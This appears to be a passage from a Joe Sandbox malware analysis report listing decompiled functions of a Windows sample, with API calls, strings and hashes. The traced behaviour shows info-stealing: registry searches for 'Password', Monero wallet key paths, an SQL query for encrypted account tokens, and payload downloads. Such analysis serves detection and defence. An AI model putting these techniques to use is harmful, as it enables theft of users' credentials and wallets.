                    • Instruction ID: 560b4e68763cf21f2fa141374d8ad1dec1db0f020f3ec2b6f7821d3f99e5aee5
                    • Opcode Fuzzy Hash: 917a3a3eb6a3566d9e7e728f60df3e3e4c0fe74dc28b941c3b54083e38fb81f5
                    • Instruction Fuzzy Hash: 21213DB1E44218ABDB00DFD5CD49FAFB7B8FB44B14F104609F615BB280DB7869018BA5
                    Function 009560A0 Relevance: 13.6, APIs: 9, Instructions: 133networkfileCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 0096A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0096A7E6
                      • Part of subcall function 009547B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00954839
                      • Part of subcall function 009547B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00954849
                    • InternetOpenA.WININET(00970DF7,00000001,00000000,00000000,00000000), ref: 0095610F
                    • StrCmpCA.SHLWAPI(?,005BE8F8), ref: 00956147
                    • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 0095618F
                    • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 009561B3
                    • InternetReadFile.WININET(?,?,00000400,?), ref: 009561DC
                    • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 0095620A
                    • CloseHandle.KERNEL32(?,?,00000400), ref: 00956249
                    • InternetCloseHandle.WININET(?), ref: 00956253
                    • InternetCloseHandle.WININET(00000000), ref: 00956260
                    Memory Dump Source
                    • Source File: 00000000.00000002.1722191751.0000000000951000.00000040.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true
                    • Associated: 00000000.00000002.1722173092.0000000000950000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000A01000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000A0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000A32000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000B9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000D34000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E0B000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E37000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E45000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722733864.0000000000E46000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722863891.0000000000FDC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722890392.0000000000FDD000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_950000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Internet$CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                    • String ID:
                    • API String ID: 2507841554-0
                    • Opcode ID: dcd3e430ca6180125937cc024d2ae5f403e2af0d5ee7327774004a9486ebbd74
                    • Instruction ID: 3a810c09dc2fdc71742aa07635d8e62ea49449e5f258bb3a568b88474d361096
                    • Opcode Fuzzy Hash: dcd3e430ca6180125937cc024d2ae5f403e2af0d5ee7327774004a9486ebbd74
                    • Instruction Fuzzy Hash: 8F518FB1A00208ABDB20DFA1DD49BEE77B8EB44701F508199FA05A71C0DB746E89CF95
                    Function 009572D0 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 149registrymemoryCOMMON
                    Download Yara Rule
                    APIs
                    • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 0095733A
                    • RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 009573B1
                    • StrStrA.SHLWAPI(00000000,Password,00000000), ref: 0095740D
                    • GetProcessHeap.KERNEL32(00000000,?), ref: 00957452
                    • HeapFree.KERNEL32(00000000), ref: 00957459
                    • task.LIBCPMTD ref: 00957555
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1722191751.0000000000951000.00000040.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true
                    • Associated: 00000000.00000002.1722173092.0000000000950000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000A01000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000A0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000A32000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000B9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000D34000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E0B000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E37000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E45000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722733864.0000000000E46000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722863891.0000000000FDC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722890392.0000000000FDD000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_950000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Heap$EnumFreeOpenProcessValuetask
                    • String ID: Password
                    • API String ID: 775622407-3434357891
                    • Opcode ID: 676034a22b11e39227a0abeff2323f8aafe999f364c23a6b3e0210121cda00a0
                    • Instruction ID: 3f044c041109e5e7b2a763547239242bb757da252959530e54a858c3dd068f99
                    • Opcode Fuzzy Hash: 676034a22b11e39227a0abeff2323f8aafe999f364c23a6b3e0210121cda00a0
                    • Instruction Fuzzy Hash: DC613CB59042589BDB24DF51DC45BDAB7B8BF84301F0081E9EA49A6181EF705FC9CFA1
                    Function 0095BA80 Relevance: 12.3, APIs: 4, Strings: 4, Instructions: 284stringCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 0096A740: lstrcpy.KERNEL32(00970E17,00000000), ref: 0096A788
                      • Part of subcall function 0096A9B0: lstrlen.KERNEL32(?,005B9248,?,\Monero\wallet.keys,00970E17), ref: 0096A9C5
                      • Part of subcall function 0096A9B0: lstrcpy.KERNEL32(00000000), ref: 0096AA04
                      • Part of subcall function 0096A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0096AA12
                      • Part of subcall function 0096A920: lstrcpy.KERNEL32(00000000,?), ref: 0096A972
                      • Part of subcall function 0096A920: lstrcat.KERNEL32(00000000), ref: 0096A982
                      • Part of subcall function 0096A8A0: lstrcpy.KERNEL32(?,00970E17), ref: 0096A905
                      • Part of subcall function 0096A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0096A7E6
                    • lstrlen.KERNEL32(00000000), ref: 0095BC9F
                      • Part of subcall function 00968E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00968E52
                    • StrStrA.SHLWAPI(00000000,AccountId), ref: 0095BCCD
                    • lstrlen.KERNEL32(00000000), ref: 0095BDA5
                    • lstrlen.KERNEL32(00000000), ref: 0095BDB9
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1722191751.0000000000951000.00000040.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true
                    • Associated: 00000000.00000002.1722173092.0000000000950000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000A01000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000A0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000A32000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000B9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000D34000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E0B000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E37000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E45000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722733864.0000000000E46000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722863891.0000000000FDC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722890392.0000000000FDD000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_950000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: lstrcpy$lstrlen$lstrcat$AllocLocal
                    • String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service
                    • API String ID: 3073930149-1079375795
                    • Opcode ID: d39e085e917bcf883cd1671c0c5722e014548fc25e83d10268d86485721700b9
                    • Instruction ID: 07b27f77f2b4ec5bd6c4d1fa106ae67dcf03691a3ec4f8d424d262a24ab5716a
                    • Opcode Fuzzy Hash: d39e085e917bcf883cd1671c0c5722e014548fc25e83d10268d86485721700b9
                    • Instruction Fuzzy Hash: 23B11972910108ABDB04FBA4DD96FEE7339AF94300F504569F506B7092EF346A49CFA6
                    Function 00966770 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 27COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1722191751.0000000000951000.00000040.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true
                    • Associated: 00000000.00000002.1722173092.0000000000950000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000A01000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000A0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000A32000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000B9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000D34000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E0B000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E37000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E45000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722733864.0000000000E46000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722863891.0000000000FDC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722890392.0000000000FDD000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_950000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: ExitProcess$DefaultLangUser
                    • String ID: *
                    • API String ID: 1494266314-163128923
                    • Opcode ID: 0652666142677b37aa7f8275b57a679daaddff747913b02d2f3359942f722c37
                    • Instruction ID: 1d9ace9ee8663b7345eabe0d246d2ad72d8dd0b843716dcfaf794a42ab3bdeb0
                    • Opcode Fuzzy Hash: 0652666142677b37aa7f8275b57a679daaddff747913b02d2f3359942f722c37
                    • Instruction Fuzzy Hash: EFF05E30908209EFD3449FE0EA0A72C7B70FB04703F24019AE60987290DA785F419BD6
                    Function 00954FB0 Relevance: 10.6, APIs: 7, Instructions: 83networkmemoryfileCOMMON
                    Download Yara Rule
                    APIs
                    • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00954FCA
                    • RtlAllocateHeap.NTDLL(00000000), ref: 00954FD1
                    • InternetOpenA.WININET(00970DDF,00000000,00000000,00000000,00000000), ref: 00954FEA
                    • InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 00955011
                    • InternetReadFile.WININET(?,?,00000400,00000000), ref: 00955041
                    • InternetCloseHandle.WININET(?), ref: 009550B9
                    • InternetCloseHandle.WININET(?), ref: 009550C6
                    Memory Dump Source
                    • Source File: 00000000.00000002.1722191751.0000000000951000.00000040.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true
                    • Associated: 00000000.00000002.1722173092.0000000000950000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000A01000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000A0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000A32000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000B9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000D34000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E0B000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E37000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E45000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722733864.0000000000E46000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722863891.0000000000FDC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722890392.0000000000FDD000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_950000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessRead
                    • String ID:
                    • API String ID: 3066467675-0
                    • Opcode ID: 2e3e0840ae9d6beb26a12c2e40b9fda5e1cbe4e94c8bba68f705eeffcd3f8c3d
                    • Instruction ID: fc9419f008d1d7579cee9524e9af983a6144823ed9cf8b177211cc32bef82f2c
                    • Opcode Fuzzy Hash: 2e3e0840ae9d6beb26a12c2e40b9fda5e1cbe4e94c8bba68f705eeffcd3f8c3d
                    • Instruction Fuzzy Hash: 6F31F4B4A00218ABDB20CF94DD85BDDB7B4FB48704F1081D9FA09A7281DB746EC58F99
                    Function 009683DC Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 64registrystringCOMMON
                    Download Yara Rule
                    APIs
                    • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00968426
                    • wsprintfA.USER32 ref: 00968459
                    • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 0096847B
                    • RegCloseKey.ADVAPI32(00000000), ref: 0096848C
                    • RegCloseKey.ADVAPI32(00000000), ref: 00968499
                      • Part of subcall function 0096A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0096A7E6
                    • RegQueryValueExA.ADVAPI32(00000000,005BDFD8,00000000,000F003F,?,00000400), ref: 009684EC
                    • lstrlen.KERNEL32(?), ref: 00968501
                    • RegQueryValueExA.ADVAPI32(00000000,005BE110,00000000,000F003F,?,00000400,00000000,?,?,00000000,?,00970B34), ref: 00968599
                    • RegCloseKey.ADVAPI32(00000000), ref: 00968608
                    • RegCloseKey.ADVAPI32(00000000), ref: 0096861A
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1722191751.0000000000951000.00000040.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true
                    • Associated: 00000000.00000002.1722173092.0000000000950000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000A01000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000A0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000A32000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000B9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000D34000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E0B000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E37000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E45000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722733864.0000000000E46000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722863891.0000000000FDC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722890392.0000000000FDD000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_950000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Close$QueryValue$EnumOpenlstrcpylstrlenwsprintf
                    • String ID: %s\%s
                    • API String ID: 3896182533-4073750446
                    • Opcode ID: 898a7a701b12c5a1fc4ad7ee83a89af752520c843a7cec6a00c2d81ecbe880e9
                    • Instruction ID: f869fbf4ee2430f055748143964cf369a10c0f43c78698e4f4a0c6e8da64051c
                    • Opcode Fuzzy Hash: 898a7a701b12c5a1fc4ad7ee83a89af752520c843a7cec6a00c2d81ecbe880e9
                    • Instruction Fuzzy Hash: 2421E9B1A10218ABDB24DB54DD85FE9B3B8FB48700F00C5D9E609A7180DF756A85CFD4
                    Function 00967690 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 43registrymemoryCOMMON
                    Download Yara Rule
                    APIs
                    • GetProcessHeap.KERNEL32(00000000,00000104), ref: 009676A4
                    • RtlAllocateHeap.NTDLL(00000000), ref: 009676AB
                    • RegOpenKeyExA.ADVAPI32(80000002,005AC320,00000000,00020119,00000000), ref: 009676DD
                    • RegQueryValueExA.ADVAPI32(00000000,005BDFC0,00000000,00000000,?,000000FF), ref: 009676FE
                    • RegCloseKey.ADVAPI32(00000000), ref: 00967708
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1722191751.0000000000951000.00000040.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true
                    • Associated: 00000000.00000002.1722173092.0000000000950000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000A01000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000A0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000A32000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000B9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000D34000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E0B000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E37000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E45000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722733864.0000000000E46000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722863891.0000000000FDC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722890392.0000000000FDD000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_950000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Heap$AllocateCloseOpenProcessQueryValue
                    • String ID: Windows 11
                    • API String ID: 3225020163-2517555085
                    • Opcode ID: 6bedcef36afa81fee20a10f1265a5f1c5b02c02c2983fba627e293671320e3af
                    • Instruction ID: db5cebc7217cba19bb4adbe2f147a89aa71f560cfdefaacaabb757ecaf01290e
                    • Opcode Fuzzy Hash: 6bedcef36afa81fee20a10f1265a5f1c5b02c02c2983fba627e293671320e3af
                    • Instruction Fuzzy Hash: D00162B5A04304FBDB00DBE4DE8AF6DB7BCEB48705F104456FA04D7291EA7499008B91
                    Function 00967720 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 42registrymemoryCOMMON
                    Download Yara Rule
                    APIs
                    • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00967734
                    • RtlAllocateHeap.NTDLL(00000000), ref: 0096773B
                    • RegOpenKeyExA.ADVAPI32(80000002,005AC320,00000000,00020119,009676B9), ref: 0096775B
                    • RegQueryValueExA.ADVAPI32(009676B9,CurrentBuildNumber,00000000,00000000,?,000000FF), ref: 0096777A
                    • RegCloseKey.ADVAPI32(009676B9), ref: 00967784
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1722191751.0000000000951000.00000040.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true
                    • Associated: 00000000.00000002.1722173092.0000000000950000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000A01000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000A0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000A32000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000B9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000D34000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E0B000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E37000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E45000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722733864.0000000000E46000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722863891.0000000000FDC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722890392.0000000000FDD000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_950000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Heap$AllocateCloseOpenProcessQueryValue
                    • String ID: CurrentBuildNumber
                    • API String ID: 3225020163-1022791448
                    • Opcode ID: 2fc6714925da996fbe91125ee45cd5e499a4c56f91ed52762c145b1ac0a0e2de
                    • Instruction ID: 7ac267c3fbadcead890ddd231c46d5542914d789c3f37213987f8d6b886a0e84
                    • Opcode Fuzzy Hash: 2fc6714925da996fbe91125ee45cd5e499a4c56f91ed52762c145b1ac0a0e2de
                    • Instruction Fuzzy Hash: D40112B5A40308FBDB00DBE4DD8AFAEB7B8EB48705F104559FA05A7281DA745A008B91
                    Function 009599C0 Relevance: 9.1, APIs: 6, Instructions: 82filememoryCOMMON
                    Download Yara Rule
                    APIs
                    • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 009599EC
                    • GetFileSizeEx.KERNEL32(000000FF,?), ref: 00959A11
                    • LocalAlloc.KERNEL32(00000040,?), ref: 00959A31
                    • ReadFile.KERNEL32(000000FF,?,00000000,0095148F,00000000), ref: 00959A5A
                    • LocalFree.KERNEL32(0095148F), ref: 00959A90
                    • CloseHandle.KERNEL32(000000FF), ref: 00959A9A
                    Memory Dump Source
                    • Source File: 00000000.00000002.1722191751.0000000000951000.00000040.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true
                    • Associated: 00000000.00000002.1722173092.0000000000950000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000A01000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000A0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000A32000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000B9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000D34000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E0B000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E37000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E45000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722733864.0000000000E46000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722863891.0000000000FDC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722890392.0000000000FDD000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_950000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                    • String ID:
                    • API String ID: 2311089104-0
                    • Opcode ID: ba65c46d4ee004665e37298c487e263b046f18eeee152afddb6ef36bb4e46c93
                    • Instruction ID: 1d3baad735dc0b836cc7c49e76807a31af63f55e15e81a8a977f95d71174de83
                    • Opcode Fuzzy Hash: ba65c46d4ee004665e37298c487e263b046f18eeee152afddb6ef36bb4e46c93
                    • Instruction Fuzzy Hash: 17314D74A00209EFDF14CF95C985BAE77B9FF48341F108159E901A7290DB78A945CFA1
                    Function 00964780 Relevance: 8.9, APIs: 7, Instructions: 101stringCOMMON
                    Download Yara Rule
                    APIs
                    • lstrcat.KERNEL32(?,005BE1D0), ref: 009647DB
                      • Part of subcall function 00968DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00968E0B
                    • lstrcat.KERNEL32(?,00000000), ref: 00964801
                    • lstrcat.KERNEL32(?,?), ref: 00964820
                    • lstrcat.KERNEL32(?,?), ref: 00964834
                    • lstrcat.KERNEL32(?,005AB748), ref: 00964847
                    • lstrcat.KERNEL32(?,?), ref: 0096485B
                    • lstrcat.KERNEL32(?,005BDAE0), ref: 0096486F
                      • Part of subcall function 0096A740: lstrcpy.KERNEL32(00970E17,00000000), ref: 0096A788
                      • Part of subcall function 00968D90: GetFileAttributesA.KERNEL32(00000000,?,00951B54,?,?,0097564C,?,?,00970E1F), ref: 00968D9F
                      • Part of subcall function 00964570: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00964580
                      • Part of subcall function 00964570: RtlAllocateHeap.NTDLL(00000000), ref: 00964587
                      • Part of subcall function 00964570: wsprintfA.USER32 ref: 009645A6
                      • Part of subcall function 00964570: FindFirstFileA.KERNEL32(?,?), ref: 009645BD
                    Memory Dump Source
                    • Source File: 00000000.00000002.1722191751.0000000000951000.00000040.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true
